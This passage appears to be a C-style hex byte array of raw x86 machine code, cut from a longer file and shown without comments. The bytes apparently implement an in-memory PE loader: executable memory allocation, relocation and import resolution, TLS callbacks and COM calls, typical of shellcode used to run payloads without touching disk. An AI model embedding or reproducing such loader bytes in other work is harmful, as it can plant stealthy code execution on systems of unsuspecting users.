441 0x8d, 0x44, 0x24, 0x28, 0x50, 0x53, 0xe8, 0x7d, 0xf5, 0xff, 0xff, 0xeb,
442 0x07, 0x56, 0x53, 0xe8, 0xa6, 0x03, 0x00, 0x00, 0x59, 0x59, 0x8b, 0x7c,
443 0x24, 0x10, 0x8b, 0x83, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x74,
444 0x05, 0x83, 0xf8, 0x03, 0x75, 0x33, 0x8b, 0x83, 0x20, 0x09, 0x00, 0x00,
445 0x85, 0xc0, 0x74, 0x29, 0xff, 0xb3, 0x18, 0x09, 0x00, 0x00, 0x6a, 0x00,
446 0x50, 0xe8, 0xcc, 0x10, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0,
447 0x00, 0x00, 0x6a, 0x00, 0xff, 0xb3, 0x20, 0x09, 0x00, 0x00, 0xff, 0x54,
448 0x24, 0x20, 0x83, 0xa3, 0x20, 0x09, 0x00, 0x00, 0x00, 0xff, 0x33, 0x8b,
449 0xb3, 0x30, 0x02, 0x00, 0x00, 0x6a, 0x00, 0x53, 0xe8, 0xa1, 0x10, 0x00,
450 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00, 0x53,
451 0xff, 0x54, 0x24, 0x20, 0x83, 0xfe, 0x02, 0x75, 0x04, 0x6a, 0x00, 0xff,
452 0xd7, 0x33, 0xc0, 0xe9, 0xa6, 0xfc, 0xff, 0xff, 0x81, 0xec, 0x78, 0x02,
453 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0x8c, 0x02, 0x00, 0x00,
454 0x33, 0xc0, 0x57, 0x8d, 0x7c, 0x24, 0x44, 0x33, 0xed, 0x21, 0x6c, 0x24,
455 0x1c, 0xab, 0xab, 0xab, 0xab, 0x33, 0xc0, 0x83, 0x3e, 0x02, 0x66, 0x89,
456 0x44, 0x24, 0x18, 0x0f, 0x85, 0x7e, 0x01, 0x00, 0x00, 0x8b, 0x84, 0x24,
457 0x94, 0x02, 0x00, 0x00, 0x8b, 0x48, 0x14, 0x8d, 0x78, 0x1c, 0x57, 0x51,
458 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0, 0x0f, 0x88, 0x5b, 0x01, 0x00,
459 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x1c, 0x52, 0x50, 0x8b, 0x08, 0xff,
460 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0xbe, 0x02, 0x00, 0x00, 0x8b, 0x9c,
461 0x24, 0x8c, 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x6a, 0x01,
462 0xff, 0x74, 0x24, 0x24, 0xff, 0x53, 0x7c, 0x8d, 0x44, 0x24, 0x28, 0x50,
463 0x6a, 0x01, 0xff, 0x74, 0x24, 0x24, 0xff, 0x93, 0x80, 0x00, 0x00, 0x00,
464 0x8b, 0x44, 0x24, 0x28, 0x2b, 0x44, 0x24, 0x2c, 0x83, 0xc0, 0x01, 0x0f,
465 0x84, 0xcc, 0x00, 0x00, 0x00, 0x6a, 0x01, 0x55, 0x6a, 0x0c, 0xff, 0x53,
466 0x70, 0x81, 0xc6, 0x0c, 0x04, 0x00, 0x00, 0x8b, 0xe8, 0x80, 0x3e, 0x00,
467 0x74, 0x70, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x56, 0x53,
468 0xe8, 0x19, 0x0b, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x14,
469 0x50, 0x8d, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x50, 0xff, 0x53, 0x68,
470 0xff, 0x74, 0x24, 0x14, 0x8b, 0xf0, 0xb8, 0x08, 0x20, 0x00, 0x00, 0x6a,
471 0x00, 0x6a, 0x08, 0x66, 0x89, 0x44, 0x24, 0x40, 0xff, 0x53, 0x70, 0x33,
472 0xc9, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x4c, 0x24, 0x10, 0x39, 0x4c, 0x24,
473 0x14, 0x76, 0x5b, 0xff, 0x34, 0x8e, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00,
474 0x50, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xff, 0x74, 0x24, 0x44, 0xff, 0x53,
475 0x74, 0x8b, 0x4c, 0x24, 0x10, 0x41, 0x89, 0x4c, 0x24, 0x10, 0x3b, 0x4c,
476 0x24, 0x14, 0x72, 0xdb, 0xeb, 0x34, 0x6a, 0x01, 0x6a, 0x00, 0xb8, 0x08,
477 0x20, 0x00, 0x00, 0x6a, 0x08, 0x66, 0x89, 0x44, 0x24, 0x40, 0xff, 0x53,
478 0x70, 0x83, 0x64, 0x24, 0x10, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x8d, 0x44,
479 0x24, 0x18, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44,
480 0x24, 0x14, 0x50, 0xff, 0x74, 0x24, 0x44, 0xff, 0x53, 0x74, 0x83, 0x64,
481 0x24, 0x10, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x8d, 0x44, 0x24, 0x14,
482 0x50, 0x55, 0xff, 0x53, 0x74, 0x83, 0x64, 0x24, 0x4c, 0x00, 0x8d, 0x54,
483 0x24, 0x64, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x48, 0x40, 0x66, 0x89,
484 0x44, 0x24, 0x48, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10, 0x8b, 0xfc, 0x8b,
485 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94, 0x00, 0x00, 0x00,
486 0x85, 0xed, 0x0f, 0x84, 0x88, 0x01, 0x00, 0x00, 0xff, 0x74, 0x24, 0x3c,
487 0xff, 0x53, 0x78, 0x55, 0xff, 0x53, 0x78, 0xe9, 0x78, 0x01, 0x00, 0x00,
488 0x21, 0x2f, 0xe9, 0x71, 0x01, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x8c, 0x02,
489 0x00, 0x00, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x86,
490 0x0c, 0x02, 0x00, 0x00, 0x50, 0x53, 0xe8, 0x0b, 0x0a, 0x00, 0x00, 0x83,
491 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0xff, 0x93,
492 0x84, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x89, 0x6c, 0x24, 0x20, 0x85, 0xed,
493 0x0f, 0x84, 0x39, 0x01, 0x00, 0x00, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00,
494 0x00, 0x50, 0x8d, 0x86, 0x0c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xe8, 0xd7,
495 0x09, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00,
496 0x00, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24,
497 0x85, 0xc0, 0x0f, 0x84, 0xfd, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x94,
498 0x02, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52,
499 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x3c, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85,
500 0xff, 0x0f, 0x88, 0xcf, 0x00, 0x00, 0x00, 0x81, 0xc6, 0x0c, 0x04, 0x00,
501 0x00, 0x33, 0xed, 0x80, 0x3e, 0x00, 0x74, 0x7e, 0x8d, 0x84, 0x24, 0x84,
502 0x00, 0x00, 0x00, 0x50, 0x56, 0x53, 0xe8, 0x7b, 0x09, 0x00, 0x00, 0x83,
503 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x84, 0x24, 0x88, 0x00,
504 0x00, 0x00, 0x50, 0xff, 0x53, 0x68, 0xff, 0x74, 0x24, 0x14, 0x8b, 0xf0,
505 0x55, 0x6a, 0x0c, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x4a,
506 0x33, 0xc9, 0x89, 0x4c, 0x24, 0x10, 0x39, 0x4c, 0x24, 0x14, 0x76, 0x3e,
507 0xff, 0x34, 0x8e, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x6a, 0x08, 0x89,
508 0x44, 0x24, 0x60, 0x58, 0x66, 0x89, 0x44, 0x24, 0x54, 0x8d, 0x44, 0x24,
509 0x54, 0x50, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x55, 0xff, 0x53, 0x74, 0x8b,
510 0xf8, 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x78, 0x33, 0xed, 0x8b,
511 0x4c, 0x24, 0x10, 0x41, 0x89, 0x4c, 0x24, 0x10, 0x3b, 0x4c, 0x24, 0x14,
512 0x72, 0xc2, 0x85, 0xff, 0x78, 0x3c, 0x8b, 0x44, 0x24, 0x30, 0x8d, 0x54,
513 0x24, 0x74, 0x52, 0x55, 0x83, 0xec, 0x10, 0x8d, 0x74, 0x24, 0x5c, 0x8b,
514 0x00, 0x8b, 0xfc, 0x6a, 0x00, 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00,
515 0x00, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x44, 0x56, 0x50, 0xff, 0x91,
516 0xe4, 0x00, 0x00, 0x00, 0x85, 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x78,
517 0x8b, 0x6c, 0x24, 0x20, 0xeb, 0x08, 0x8b, 0x6c, 0x24, 0x20, 0x8b, 0x74,
518 0x24, 0x24, 0x56, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x55, 0xff, 0x93,
519 0x88, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81,
520 0xc4, 0x78, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0x24, 0x02, 0x00, 0x00,
521 0x53, 0x8b, 0x9c, 0x24, 0x2c, 0x02, 0x00, 0x00, 0x33, 0xc0, 0x55, 0x8b,
522 0xac, 0x24, 0x34, 0x02, 0x00, 0x00, 0x81, 0xc5, 0x28, 0x05, 0x00, 0x00,
523 0x89, 0x44, 0x24, 0x1c, 0x57, 0x50, 0x89, 0x6c, 0x24, 0x28, 0x8b, 0x7d,
524 0x3c, 0x03, 0xfd, 0x89, 0x7c, 0x24, 0x20, 0xff, 0x53, 0x38, 0x66, 0x8b,
525 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b, 0x4c,
526 0x02, 0x04, 0x0f, 0x85, 0xed, 0x03, 0x00, 0x00, 0x8b, 0x4f, 0x50, 0xb8,
527 0x00, 0x30, 0x00, 0x00, 0x56, 0x6a, 0x40, 0x50, 0x89, 0x44, 0x24, 0x1c,
528 0xb8, 0x00, 0x10, 0x00, 0x00, 0x03, 0xc8, 0x51, 0x6a, 0x00, 0xff, 0x53,
529 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xc5, 0x03, 0x00, 0x00, 0xff,
530 0x77, 0x54, 0x55, 0x56, 0xe8, 0xb5, 0x0c, 0x00, 0x00, 0x0f, 0xb7, 0x6f,
531 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x1c, 0x00, 0x83, 0xc4, 0x0c, 0x83,
532 0xc5, 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x32, 0x8b, 0x5c, 0x24, 0x10,
533 0x03, 0xef, 0xff, 0x75, 0xfc, 0x8b, 0x45, 0x00, 0x03, 0x44, 0x24, 0x2c,
534 0x50, 0x8b, 0x45, 0xf8, 0x03, 0xc6, 0x50, 0xe8, 0x82, 0x0c, 0x00, 0x00,
535 0x0f, 0xb7, 0x47, 0x06, 0x8d, 0x6d, 0x28, 0x83, 0xc4, 0x0c, 0x43, 0x3b,
536 0xd8, 0x72, 0xdb, 0x8b, 0x9c, 0x24, 0x38, 0x02, 0x00, 0x00, 0x8b, 0x87,
537 0xa0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x76, 0x8d, 0x2c, 0x30, 0x8b,
538 0xc6, 0x2b, 0x47, 0x34, 0x83, 0x7d, 0x00, 0x00, 0x89, 0x44, 0x24, 0x10,
539 0x74, 0x64, 0x8d, 0x4d, 0x08, 0xeb, 0x4b, 0x0f, 0xb7, 0x01, 0x8b, 0xd0,
540 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x18, 0x66, 0x3b, 0x44,
541 0x24, 0x14, 0x75, 0x25, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00, 0x00, 0x89,
542 0x44, 0x24, 0x18, 0x03, 0x45, 0x00, 0x8b, 0x0c, 0x30, 0x03, 0x4c, 0x24,
543 0x10, 0x8b, 0x44, 0x24, 0x18, 0x03, 0x45, 0x00, 0x89, 0x0c, 0x30, 0x8b,
544 0x4c, 0x24, 0x1c, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b,
545 0xd0, 0x0f, 0x83, 0xfe, 0x02, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x45,
546 0x04, 0x03, 0xc5, 0x89, 0x4c, 0x24, 0x1c, 0x3b, 0xc8, 0x75, 0xa8, 0x83,
547 0x39, 0x00, 0x8b, 0xe9, 0x75, 0x9c, 0x8b, 0x87, 0x80, 0x00, 0x00, 0x00,
548 0x85, 0xc0, 0x0f, 0x84, 0xa5, 0x00, 0x00, 0x00, 0x8d, 0x2c, 0x30, 0x8b,
549 0x45, 0x0c, 0x89, 0x6c, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x84, 0x93, 0x00,
550 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x03, 0xc6, 0x50,
551 0xff, 0x53, 0x30, 0x8b, 0x55, 0x10, 0x89, 0x44, 0x24, 0x1c, 0x03, 0xd6,
552 0x8b, 0x45, 0x00, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x14, 0x89, 0x44, 0x24,
553 0x18, 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x54, 0x8b, 0xea, 0x79, 0x05, 0x0f,
554 0xb7, 0xc1, 0xeb, 0x28, 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x83, 0x7f, 0x04,
555 0x00, 0x89, 0x44, 0x24, 0x14, 0x74, 0x19, 0x50, 0x53, 0xe8, 0xa8, 0xf4,
556 0xff, 0xff, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x08, 0x8b, 0x83, 0xd8, 0x00,
557 0x00, 0x00, 0xeb, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x50, 0xff, 0x74, 0x24,
558 0x20, 0xff, 0x53, 0x34, 0x89, 0x45, 0x00, 0x83, 0xc5, 0x04, 0x8b, 0x44,
559 0x24, 0x18, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24, 0x18, 0x8b, 0x08, 0x85,
560 0xc9, 0x75, 0xb2, 0x8b, 0x6c, 0x24, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xc5,
561 0x14, 0x89, 0x6c, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x85, 0x78, 0xff, 0xff,
562 0xff, 0x8b, 0x7c, 0x24, 0x20, 0x8b, 0x87, 0xe0, 0x00, 0x00, 0x00, 0x85,
563 0xc0, 0x74, 0x77, 0x8d, 0x6e, 0x04, 0x03, 0xe8, 0x89, 0x6c, 0x24, 0x1c,
564 0x8b, 0x45, 0x00, 0x85, 0xc0, 0x74, 0x67, 0x03, 0xc6, 0x50, 0xff, 0x53,
565 0x30, 0x89, 0x44, 0x24, 0x10, 0x85, 0xc0, 0x74, 0x47, 0x8b, 0x4d, 0x0c,
566 0x8b, 0x55, 0x08, 0x03, 0xce, 0x03, 0xd6, 0x89, 0x4c, 0x24, 0x14, 0x89,
567 0x54, 0x24, 0x18, 0x8b, 0x01, 0x85, 0xc0, 0x74, 0x2f, 0x8b, 0xf9, 0x8b,
568 0xea, 0x8b, 0x4b, 0x34, 0x85, 0xc0, 0x79, 0x05, 0x0f, 0xb7, 0xc0, 0xeb,
569 0x05, 0x83, 0xc0, 0x02, 0x03, 0xc6, 0x50, 0xff, 0x74, 0x24, 0x14, 0xff,
570 0xd1, 0x83, 0xc7, 0x04, 0x89, 0x45, 0x00, 0x83, 0xc5, 0x04, 0x8b, 0x07,
571 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0x6c, 0x24, 0x1c, 0x83, 0xc5, 0x20, 0x89,
572 0x6c, 0x24, 0x1c, 0x8b, 0x45, 0x00, 0x85, 0xc0, 0x75, 0x9d, 0x8b, 0x7c,
573 0x24, 0x20, 0x8b, 0xaf, 0xc0, 0x00, 0x00, 0x00, 0x85, 0xed, 0x74, 0x1b,
574 0x8b, 0x6c, 0x2e, 0x0c, 0x85, 0xed, 0x74, 0x13, 0xeb, 0x0a, 0x6a, 0x00,
575 0x6a, 0x01, 0x56, 0xff, 0xd0, 0x8d, 0x6d, 0x04, 0x8b, 0x45, 0x00, 0x85,
576 0xc0, 0x75, 0xef, 0x8b, 0x84, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x8b, 0x6f,
577 0x28, 0x03, 0xee, 0x83, 0x38, 0x03, 0x0f, 0x85, 0x0b, 0x01, 0x00, 0x00,
578 0x6a, 0x00, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd5, 0x8b, 0x94,
579 0x24, 0x3c, 0x02, 0x00, 0x00, 0x81, 0xc2, 0x0c, 0x03, 0x00, 0x00, 0x89,
580 0x54, 0x24, 0x2c, 0x80, 0x3a, 0x00, 0x0f, 0x84, 0x55, 0x01, 0x00, 0x00,
581 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0x4a, 0x01, 0x00, 0x00, 0x8b,
582 0x6c, 0x31, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x3e, 0x01, 0x00, 0x00, 0x8b,
583 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x44, 0x31,
584 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24,
585 0x14, 0x8d, 0x04, 0xa8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x20, 0x8b,
586 0x00, 0x03, 0xc6, 0x52, 0x50, 0xe8, 0x4d, 0x0a, 0x00, 0x00, 0x59, 0x59,
587 0x85, 0xc0, 0x74, 0x16, 0x8b, 0x44, 0x24, 0x20, 0x83, 0xe8, 0x04, 0x89,
588 0x44, 0x24, 0x20, 0x83, 0xed, 0x01, 0x74, 0x1c, 0x8b, 0x54, 0x24, 0x2c,
589 0xeb, 0xd9, 0x8b, 0x44, 0x24, 0x14, 0x8b, 0x4c, 0x24, 0x10, 0x0f, 0xb7,
590 0x44, 0x68, 0xfe, 0x8b, 0x04, 0x81, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x24,
591 0xff, 0x77, 0x54, 0x6a, 0x00, 0x56, 0xe8, 0xfb, 0x09, 0x00, 0x00, 0xff,
592 0x77, 0x54, 0x6a, 0x00, 0xff, 0x74, 0x24, 0x3c, 0xe8, 0xed, 0x09, 0x00,
593 0x00, 0x8b, 0x44, 0x24, 0x3c, 0x83, 0xc4, 0x18, 0x85, 0xc0, 0x0f, 0x84,
594 0xb5, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x8d,
595 0xbd, 0x0c, 0x04, 0x00, 0x00, 0x80, 0x3f, 0x00, 0x74, 0x31, 0x8b, 0x8d,
596 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc9, 0x74, 0x15, 0x8d, 0x44, 0x24, 0x30,
597 0x50, 0x57, 0x53, 0xe8, 0x0a, 0x05, 0x00, 0x00, 0x8b, 0x8d, 0x0c, 0x05,
598 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x85, 0xc9, 0x8d, 0x44, 0x24, 0x30, 0x0f,
599 0x44, 0xc7, 0x50, 0x8b, 0x44, 0x24, 0x28, 0xff, 0xd0, 0xeb, 0x72, 0xff,
600 0xd0, 0xeb, 0x6e, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x80, 0x38, 0x00, 0x74,
601 0x1a, 0x8d, 0x4c, 0x24, 0x30, 0x51, 0x50, 0x53, 0xe8, 0xd5, 0x04, 0x00,
602 0x00, 0x8d, 0x44, 0x24, 0x3c, 0x50, 0x53, 0xe8, 0x26, 0x02, 0x00, 0x00,
603 0x83, 0xc4, 0x14, 0xff, 0x77, 0x54, 0x6a, 0x00, 0x56, 0xe8, 0x68, 0x09,
604 0x00, 0x00, 0xff, 0x77, 0x54, 0x6a, 0x00, 0xff, 0x74, 0x24, 0x3c, 0xe8,
605 0x5a, 0x09, 0x00, 0x00, 0x8b, 0x84, 0x24, 0x54, 0x02, 0x00, 0x00, 0x33,
606 0xc9, 0x83, 0xc4, 0x18, 0x39, 0x48, 0x04, 0x74, 0x15, 0x51, 0x51, 0x51,
607 0x55, 0x51, 0x51, 0xff, 0x53, 0x5c, 0x85, 0xc0, 0x74, 0x13, 0x6a, 0xff,
608 0x50, 0xff, 0x53, 0x58, 0xeb, 0x0b, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00,
609 0xff, 0x70, 0x30, 0xff, 0xd5, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00,
610 0x56, 0xff, 0x53, 0x40, 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0x24, 0x02,
611 0x00, 0x00, 0xc3, 0x81, 0xec, 0xf4, 0x02, 0x00, 0x00, 0x53, 0x8b, 0x9c,
612 0x24, 0xfc, 0x02, 0x00, 0x00, 0x55, 0x56, 0x6a, 0x04, 0x8b, 0x83, 0x18,
613 0x09, 0x00, 0x00, 0x33, 0xf6, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x04,
614 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x56, 0xff, 0x53, 0x3c, 0x8b, 0xe8,
615 0x85, 0xed, 0x0f, 0x84, 0x84, 0x01, 0x00, 0x00, 0x8b, 0x84, 0x24, 0x08,
616 0x03, 0x00, 0x00, 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x05, 0x28, 0x05,
617 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x50, 0x56, 0x56, 0xff,
618 0x53, 0x50, 0x8d, 0x44, 0x24, 0x58, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x44,
619 0x24, 0x14, 0x50, 0x53, 0xe8, 0x9f, 0xe5, 0xff, 0xff, 0x8d, 0x44, 0x24,
620 0x4c, 0x89, 0x44, 0x24, 0x24, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x53, 0xe8,
621 0x42, 0xe4, 0xff, 0xff, 0x8d, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x89,
622 0x44, 0x24, 0x38, 0x8d, 0x44, 0x24, 0x38, 0x50, 0x53, 0xe8, 0x3d, 0xee,
623 0xff, 0xff, 0x83, 0xc4, 0x18, 0x56, 0x56, 0xff, 0x93, 0xbc, 0x00, 0x00,
624 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
625 0x0c, 0x50, 0x8d, 0x83, 0x94, 0x06, 0x00, 0x00, 0x50, 0x6a, 0x03, 0x56,
626 0x8d, 0x83, 0x74, 0x06, 0x00, 0x00, 0x50, 0xff, 0x93, 0xc0, 0x00, 0x00,
627 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x4c, 0x24,
628 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0xc4, 0x06, 0x00, 0x00,
629 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x0f, 0x85, 0xa0, 0x00,
630 0x00, 0x00, 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c,
631 0x85, 0xc0, 0x0f, 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x0c,
632 0x8d, 0x54, 0x24, 0x14, 0x89, 0x4c, 0x24, 0x34, 0x52, 0x51, 0x8b, 0x01,
633 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75, 0x6d, 0x57, 0x8d, 0x84, 0x24, 0x00,
634 0x01, 0x00, 0x00, 0x50, 0x8d, 0x83, 0xe0, 0x05, 0x00, 0x00, 0x50, 0x53,
635 0xe8, 0x45, 0x03, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x00,
636 0x01, 0x00, 0x00, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x4c,
637 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff, 0x52,
638 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x5f, 0x85,
639 0xf6, 0x75, 0x27, 0x8b, 0x44, 0x24, 0x10, 0x33, 0xf6, 0x56, 0x56, 0x56,
640 0x8b, 0x08, 0x56, 0x56, 0x56, 0x56, 0x56, 0x55, 0x50, 0xff, 0x51, 0x14,
641 0x85, 0xc0, 0x75, 0x10, 0x8b, 0x44, 0x24, 0x0c, 0x6a, 0x02, 0x50, 0x8b,
642 0x08, 0xff, 0x51, 0x14, 0xeb, 0x02, 0x33, 0xf6, 0x8b, 0x44, 0x24, 0x10,
643 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x8b,
644 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24, 0x0c, 0x50, 0x8b, 0x08, 0xff,
645 0x51, 0x08, 0x8b, 0x83, 0x18, 0x09, 0x00, 0x00, 0x8d, 0x04, 0x45, 0x02,
646 0x00, 0x00, 0x00, 0x50, 0x56, 0x55, 0xe8, 0x67, 0x07, 0x00, 0x00, 0x83,
647 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x56, 0x55, 0xff, 0x53, 0x40,
648 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xf4, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec,
649 0x9c, 0x00, 0x00, 0x00, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00, 0x53, 0x55,
650 0x56, 0x8b, 0x40, 0x30, 0x57, 0x8b, 0xbc, 0x24, 0xb0, 0x00, 0x00, 0x00,
651 0x89, 0x44, 0x24, 0x14, 0x8b, 0x40, 0x10, 0x89, 0x44, 0x24, 0x18, 0x8d,
652 0x87, 0x4c, 0x03, 0x00, 0x00, 0x50, 0xff, 0x57, 0x38, 0x8b, 0xd8, 0x33,
653 0xc0, 0x8b, 0x53, 0x3c, 0x03, 0xd3, 0x0f, 0xb7, 0x6a, 0x14, 0x03, 0xea,
654 0x0f, 0xb7, 0x52, 0x06, 0x8d, 0x4d, 0x18, 0x85, 0xd2, 0x74, 0x12, 0x8b,
655 0xb7, 0x44, 0x03, 0x00, 0x00, 0x39, 0x31, 0x74, 0x6e, 0x40, 0x83, 0xc1,
656 0x28, 0x3b, 0xc2, 0x72, 0xf4, 0x8b, 0x5c, 0x24, 0x1c, 0x8b, 0x74, 0x24,
657 0x1c, 0x83, 0x64, 0x24, 0x10, 0x00, 0x85, 0xdb, 0x74, 0x48, 0x8b, 0xee,
658 0xc7, 0x44, 0x24, 0x28, 0x01, 0x00, 0x00, 0x00, 0x89, 0x6c, 0x24, 0x1c,
659 0xff, 0x75, 0x04, 0x57, 0xe8, 0x2e, 0xf0, 0xff, 0xff, 0x59, 0x59, 0x85,
660 0xc0, 0x74, 0x17, 0x8b, 0x44, 0x24, 0x18, 0x33, 0xc9, 0x41, 0x83, 0xc0,
661 0x40, 0x51, 0x55, 0x50, 0xff, 0x97, 0xc8, 0x00, 0x00, 0x00, 0x85, 0xc0,
662 0x75, 0x33, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc5, 0x04, 0x40, 0x89, 0x6c,
663 0x24, 0x1c, 0x89, 0x44, 0x24, 0x10, 0x3b, 0xc3, 0x72, 0xc6, 0x33, 0xc0,
664 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x9c, 0x00, 0x00, 0x00, 0xc3, 0x6b,
665 0xc0, 0x28, 0x8b, 0x74, 0x28, 0x24, 0x03, 0xf3, 0x8b, 0x5c, 0x28, 0x20,
666 0xc1, 0xeb, 0x02, 0xeb, 0x90, 0x33, 0xc0, 0x40, 0x50, 0x8b, 0x44, 0x24,
667 0x1c, 0x83, 0xc0, 0x40, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xff, 0x97,
668 0xd0, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24, 0xb4, 0x00, 0x00, 0x00, 0x55,
